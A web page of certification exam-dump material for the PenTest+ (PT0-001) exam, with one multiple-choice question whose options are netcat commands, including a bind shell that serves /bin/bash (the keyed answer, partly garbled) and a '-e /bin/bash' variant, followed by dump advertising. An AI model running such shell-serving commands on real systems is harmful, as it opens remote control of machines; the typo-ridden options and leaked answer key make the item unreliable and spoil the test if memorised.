Which of the following commands should the tester run on the compromised system?
A penetration tester has compromised a system and wishes to connect to a port on it from the attacking machine to control the system.
Which of the following commands should the tester run on the compromised system?
A . nc looalhot 4423
B . nc -nvlp 4423 -« /bin/bash
C . nc 10.0.0.1 4423
D . nc 127.0.0.1 4423 -e /bin/bash
Answer: B
Latest PT0-001 Dumps Valid Version with 248 Q&As
Latest And Valid Q&A | Instant Download | Once Fail, Full Refund
Subscribe
Login
0 Comments
Inline Feedbacks
View all comments